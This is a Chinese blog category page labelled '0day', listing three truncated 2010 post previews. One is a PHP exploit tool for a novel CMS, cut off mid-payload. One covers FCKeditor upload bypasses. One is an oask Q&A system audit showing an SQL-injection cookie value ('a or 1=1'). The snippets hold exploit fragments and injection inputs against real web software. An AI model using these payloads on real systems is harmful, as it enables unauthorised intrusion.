0day
xianghao110
这个作者很懒,什么都没留下…
展开
-
冷迪小说系统漏洞利用工具.php
转至黑防 <?phpini_set("max_execution_time",0);function post($v_hosts,$v_paths,$v_p){ $host = $v_hosts; $path = $v_paths; $pa = $v_p; $data="sitename=&siteurl=%24%7B%24%7转载 2010-03-07 23:14:00 · 1463 阅读 · 0 评论 -
FCKeditor漏洞所有利用页面
FCKeditor漏洞多的要命,一堆堆的网站因为这种洞而牺牲了。 1. 查看编辑器版本 FCKeditor/_whatsnew.html ———————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破 测试通过。 3.Version Upload a new file: ————————————转载 2010-03-09 10:09:00 · 11232 阅读 · 0 评论 -
oask问答系统v2.0漏洞
今天Y总要让检查一个问答系统的安全,因为他要用,没办法就当做好人吧。忍着看了下代码呼呼,那么流行的oask系统还犯那么低级的cookie错误cookie代码oASK; ASPSESSIONIDSSDDBADB=HEJJFJNCEOFFIMOBJGHBPHJB; VSN=078349ef024074d5; oASKADM=ADMUPW=a or 1=1&ADMUNM=admi原创 2010-03-09 11:39:00 · 846 阅读 · 0 评论